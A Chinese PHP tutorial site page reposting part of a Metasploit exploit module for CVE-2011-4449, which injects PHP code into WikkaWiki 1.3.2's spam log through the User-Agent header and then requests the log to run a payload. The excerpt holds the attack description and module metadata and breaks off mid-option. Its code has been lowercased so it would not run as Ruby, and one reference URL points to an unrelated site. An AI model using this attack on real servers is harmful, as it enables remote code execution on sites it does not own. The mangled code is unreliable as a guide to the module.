当前位置: 萬仟网 > IT编程>开发语言>PHP > WikkaWiki 1.3.2 Spam Logging PHP注射的方法

WikkaWiki 1.3.2 Spam Logging PHP注射的方法

2018年03月24日  | 萬仟网IT编程  | 我要评论
WikkaWiki 1.3.2 Spam Logging PHP注射的详细方法代码... 12-05-14
##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
def initialize(info={})
super(update_info(info,
'name' => "wikkawiki 1.3.2 spam logging php injection",
'description' => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'page'.
},
'license' => msf_license,
'author' =>
[
'egix', #initial discovery, poc
'sinn3r' #metasploit
],
'references' =>
[
['cve', '2011-4449'],
['osvdb', '77391'],
['edb', '18177'],
['url', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'payload' =>
{
'badchars' => "\x00"
},
'defaultoptions' =>
{
'exitfunction' => "none"
},
'arch' => arch_php,
'platform' => ['php'],
'targets' =>
[
['wikkawiki 1.3.2 r1814', {}]
],
'privileged' => false,
'disclosuredate' => "nov 30 2011",
'defaulttarget' => 0))
register_options(
[
optstring.new('username', [true, 'wikkawiki username']),
optstring.new('password', [true,

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

  • PhpStorm+xdebug+postman调试技巧分享

    PhpStorm+xdebug+postman调试技巧分享

    下面记录下我自己从安装到测试的全部详细过程。我的运行环境是:windows+wamp一.配置wamp安装目录下的php.ini文件我的安装目录是:c:\wamp... [阅读全文]
  • goto语法在PHP中的使用教程

    前言在c++、java及很多语言中,都存在着一个神奇的语法,就是goto。顾名思义,它的使用是直接去到某个地方。从代码的角度来说,也就是直接跳转到指定的地方。p... [阅读全文]
  • PHP编程一定要改掉的5个不良习惯

    这5个php编程中的不良习惯,一定要改掉 php世界上最好的语言!测试循环前数组是否为空?foreach循环或数组函数(array_*)可以处理空数组。 不需... [阅读全文]
  • 如何利用PHP实现上传图片功能详解

    如何利用PHP实现上传图片功能详解

    html文件 一、 设置编码utf-8对于中文网页需要使用<meta charset="utf-8">声明编码,否则会出现乱码。二 、form表单 ... [阅读全文]
  • php7连接MySQL实现简易查询程序的方法

    php7连接MySQL实现简易查询程序的方法

    简易教程假设我们制作的是分班情况查询程序,将使用php7的环境以pdo的方式连接mysql。通过学号和姓名查询自己所在班级。先来介绍文件结构和数据库结构:php... [阅读全文]
  • PHP 99乘法表的几种实现代码

    首先按照规矩,还是先废话一番,对于刚学php的新手来讲,用php写九九乘法表无疑是非常经典的一道练习题。但不要小看这道练习题,它对于逻辑的考验还是相当到位的。也... [阅读全文]
  • php实现记事本案例

    php实现记事本案例

    本文实例为大家分享了php实现记事本的具体代码,供大家参考,具体内容如下记事本案例要求:1)页面上有一个文本域(textarea元素),和一个发表按钮 2)用户... [阅读全文]
  • phpcmsv9.0任意文件上传漏洞解析

    phpcmsv9.0任意文件上传漏洞解析

    漏洞存在地址:burp抓包漏洞复现漏洞原理学习代码审计后补上学习链接到此这篇关于phpcmsv9.0任意文件上传漏洞解析的文章就介绍到这了,更多相关phpcms... [阅读全文]
  • Aliyun Linux 编译安装 php7.3 tengine2.3.2 mysql8.0 redis5的过程详解

    介绍之前写过 centos 安装 php,mysql,nginx 的相关文章,具体介绍这里就不写了,直接上操作步骤.安装 tengine1. 安装必要的编译环境... [阅读全文]
  • php使用event扩展的io复用测试的示例

    先要安装event扩展,这样才可以使用libevent的事件机制测试代码以上就是php使用event扩展的io复用测试的示例的详细内容,更多关于php io复用... [阅读全文]
验证码:
Copyright © 2017-2020  萬仟网 保留所有权利. 粤ICP备17035492号-1